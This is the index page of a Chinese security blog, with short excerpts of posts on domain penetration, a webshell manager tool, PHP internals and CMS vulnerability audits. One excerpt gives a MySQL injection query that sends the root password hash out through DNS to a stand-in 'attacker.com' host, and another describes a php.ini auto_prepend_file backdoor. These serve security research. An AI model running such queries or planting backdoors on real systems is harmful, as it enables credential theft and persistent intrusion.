ls -al
post @ 2017-10-10

知己知彼,百战不殆-孙子

前言

一直以来在网上域渗透的资料,几乎专注的都是一些命令,以及一些工具的使用,但是缺乏对活动目录以及与域本身的安全的研究思考。

Leia Mais
post @ 2017-10-10

Raindrop

1.Raindrop是什么?

Raindrop是一款将来可以跨平台的网站管理工具

2.为什么要开发?

首先一直觉得MacOS下没有像中国菜刀那样非常好用的服务器管理工具。
想要进行服务器管理,经常需要开虚拟机来使用菜刀,感觉非常不方便。

其次,在用过其他人开发的类似软件,例如*斧/*剑。感觉其功能性并未达到自己的需求,所以干脆自己写一个来用吧!

Leia Mais

几天前和朋友在测试一个注入,想要使用MySQL通过load_file()函数,再由DNS查询传出注入出来的数据时候遇到的问题

以下语句

1
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));

只有Windows + MySQL才能成功通过DNS查询包传出我们想要的数据

而在*nix + MySQL环境下是无法成功的。

(大家可以试试)

这是为什么呢,我探究了一下背后的原理

Leia Mais

文件:admin/login/login_check.php:26行

1
2
3
4
5
6
7
8
9
10
11
12
13
if($action=="login"){
$metinfo_admin_name = $login_name;
$metinfo_admin_pass = $login_pass;
$metinfo_admin_pass=md5($metinfo_admin_pass);
/*code*/
if($met_login_code==1){
require_once $depth.'../include/captcha.class.php';
$Captcha= new Captcha();
if(!$Captcha->CheckCode($code)){
echo("<script type='text/javascript'>alert('$lang_logincodeerror');location.href='login.php?langset=$langset';</script>");
exit;
}
}
Leia Mais

什么是序列化以及反序列化?

序列化是将PHP中的值(zval)转换成一段包含字节流的字符串。 序列化一个对象会保存对象的所有变量的值,但是不会保存对象的方法,只会保存类的名字。

反序列化:对单一的已序列化的变量进行操作,将其转换回 PHP 的值(zval)。

Leia Mais
post @ 2017-10-10

今天群里面的一位小伙伴问我关于PHP变量中refcount的问题,当时回答给他了,发现自己没注意到一个细节,记录下来。

Leia Mais

今天在看TIPI的时候读到了$PHP_SRC/main/php_globals.h里面全局变量宏中全局变量是通过php.ini来加载赋值的。
里面有两个值[图1]

1
2
char *auto_append_file;
char *auto_prepend_file;

这两个可以在主文件之前自动解析。
那么就可以通过增加这两个值实现在其他文件夹放入我们的后门文件,并且在网站的任何一个目录用这个后门.

Leia Mais

FineCMS有一个缓存功能,和当初Wordpress一样,有一个缓存功能,并且缓存的文件名不是随机的并且后缀是php,就导致了可以利用后台缓存功能来getshell。

下面是Payload

Leia Mais

首先来看一段CI内核在开启session储存在数据库选项的时候的操作.也就是

/system/core/config.php

内核配置文件设置为以下的时候

$config['sess_use_database'] = true;

Leia Mais

呵呵,昨晚和初中同学叙旧,两个人无聊找了一款网页游戏BR大逃杀玩,今天把这个网页游戏下下来简单审计了一下源码。

Leia Mais
⬆︎TOP